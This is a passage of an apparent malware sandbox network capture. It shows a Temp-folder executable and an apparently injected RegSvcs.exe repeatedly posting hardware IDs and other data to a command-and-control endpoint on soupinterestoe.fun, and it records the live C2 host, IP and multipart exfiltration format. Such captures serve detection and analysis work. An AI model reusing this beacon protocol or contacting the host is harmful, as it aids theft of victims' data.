Dec 27, 2023 17:58:15.706753969 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49822	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:15.509835958 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:15.510037899 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:16.052969933 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=4e4rov44c1bbg5ebinbohch1b0; expires=Sun, 21-Apr-2024 10:44:54 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:15 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nTte5dl8Agvn65c8lboOEJwukqlkEx4MQwvaXEcVhc8%2Fmdkjun9SzgvtZK3XvZdoa6Eg1q3F9JVECLyX0dN94I%2BzxQy6vhENyH9G6hH691M97P6Mn5czNvwpDIWj9lzYbYFFvH4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b775ab23 Data Raw: Data Ascii:
Dec 27, 2023 17:58:16.052982092 CET	37	IN	Data Raw: 35 66 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 5f-DFW15Malformed packet data
Dec 27, 2023 17:58:16.052990913 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49823	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:15.876689911 CET	366	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 3831 Host: soupinterestoe.fun
Dec 27, 2023 17:58:15.876796007 CET	3831	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:16.261521101 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=90rhfhvmgto0laplugdr64ai02; expires=Sun, 21-Apr-2024 10:44:55 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R8hE2PCHOD7lfuv9J0xKRYUI9ysxLTwRpueXtYQLw9u%2BJ92vPiFCo1L6lXxC6WScxwxX9KaGm9GhXzi7cKa83PM%2BomO%2B9ycWcp8Zdfws%2BN34qW1%2FrmaRb6q%2FDJt0%2B4ym1HKoBWU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c Data Raw: Data Ascii:
Dec 27, 2023 17:58:16.261534929 CET	40	IN	Data Raw: 31 62 37 39 61 64 36 64 36 62 33 33 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: 1b79ad6d6b33-DFWfok 212.102.41.2
Dec 27, 2023 17:58:16.261544943 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49824	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:16.508902073 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:16.509016037 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:16.888160944 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=s0al6m2ko9d1va8f8i1pbfk9p0; expires=Sun, 21-Apr-2024 10:44:55 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2WwncmE8xN5tMqR5KKkuU8peVo5s886N57hjsEziL0R2xrMnIgIwe7e3RvNeVyL1LxW9lUbicKh%2BDEkgD7L2nHAQHyZF7xiy4r%2FfME%2FrsvxrdBEQthDBC8phaDYTE70Y9ex8FLU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b7d9b8 Data Raw: Data Ascii:
Dec 27, 2023 17:58:16.888181925 CET	39	IN	Data Raw: 30 63 30 66 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 0c0f-DFW15Malformed packet data
Dec 27, 2023 17:58:16.888195038 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49825	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:16.516571999 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:16.516874075 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:16.891557932 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=9jnnqon01i2ka2mpr7ojddckn1; expires=Sun, 21-Apr-2024 10:44:55 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zP7YIVjohRNbORwBkw0nm3MVM%2FAhVvgdzd%2F07Bvf%2BWKCmEI7Udpm62ZEPr2ScbzIhPVut2M0t3cEwGP1%2F%2Fwft0QLkiqf%2FWlMTjLHfg%2B5DHU0EHtlvE3oP0vsbwEiMKWZ26VRbyI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c Data Raw: Data Ascii:
Dec 27, 2023 17:58:16.891571045 CET	47	IN	Data Raw: 31 62 37 64 61 38 34 39 36 62 61 63 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 1b7da8496bac-DFW15Malformed packet data
Dec 27, 2023 17:58:16.891581059 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49827	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:17.108705044 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:17.108767033 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:17.648160934 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=hlpv3o8uhh0anvnrmsga2ibtp3; expires=Sun, 21-Apr-2024 10:44:56 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fE2LMunrovmIdMJ7P43Ur73sASBL4Y2GCEvMPtNUZ4QvVcV5j0T%2FO2Fu%2FAoyqVwHWr%2FqPAoew78cACpa4%2FHo23GCE3qkaP9YiPBU3KlkjSYj0m1dN3cOY9wpfrw79oh55ougbQ0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b815 Data Raw: Data Ascii:
Dec 27, 2023 17:58:17.648180962 CET	41	IN	Data Raw: 32 61 34 36 32 39 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 2a4629-DFW15Malformed packet data
Dec 27, 2023 17:58:17.648219109 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49828	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:17.449259043 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:17.449450016 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:17.976341009 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=e93682qgv408g0bna9dl769qr0; expires=Sun, 21-Apr-2024 10:44:56 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZjT%2Bxa%2Bn7QTSUP7ygPckyCE4Mpw3HfMHhL%2FSUpYPlJ1Kqn9LvRgba5559lQxEjslF%2BRzLH%2B9qMre3lUtu4najfK3Ek9zitVIYlrABeXAZWlc1LhCNLl0pQbkgkt1usVwvXqr2bI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b8 Data Raw: Data Ascii:
Dec 27, 2023 17:58:17.976363897 CET	43	IN	Data Raw: 37 66 31 35 32 38 65 34 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 7f1528e4-DFW15Malformed packet data
Dec 27, 2023 17:58:17.976376057 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49829	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:17.862520933 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:17.862615108 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:18.242701054 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=k92re1265nqa9tmpov6u7ssc8d; expires=Sun, 21-Apr-2024 10:44:57 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n4RjLvQmccgXco6S456JwBkrDyi19BsXUHIwdR%2BOv7OpHAOcbdVo1uCHfbBqDTFWZkfqfy1rADSJQLB%2FkbRaoKSUmhRIBnHCcJ0x73zqkpkaPW7Ymo%2BUQdAkJg8Q%2Fuz1eEu2R5Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b860 Data Raw: Data Ascii:
Dec 27, 2023 17:58:18.242722988 CET	41	IN	Data Raw: 30 36 32 64 32 39 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 062d29-DFW15Malformed packet data
Dec 27, 2023 17:58:18.242742062 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49831	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:18.499160051 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:18.499213934 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:18.878101110 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=0ojfvaq4sli5ur01qh2kdiou4u; expires=Sun, 21-Apr-2024 10:44:57 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yQXzAEhyIj%2BotyrCrTSzL1wU2XHYXyduTwI213hbWkZ4bV6gu4UqH08X762D%2BwuCghN2uyONMc%2FZsPWs7LsxRTIKo%2FDoPRJrsy9wFDHXDn5Sn%2FVOl4kSkmFG2WK%2BqfMTuP1lv24%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31 Data Raw: Data Ascii:
Dec 27, 2023 17:58:18.878117085 CET	45	IN	Data Raw: 38 61 30 39 31 36 36 63 33 37 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 8a09166c37-DFW15Malformed packet data
Dec 27, 2023 17:58:18.878130913 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49833	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:20.209558964 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:20.209613085 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
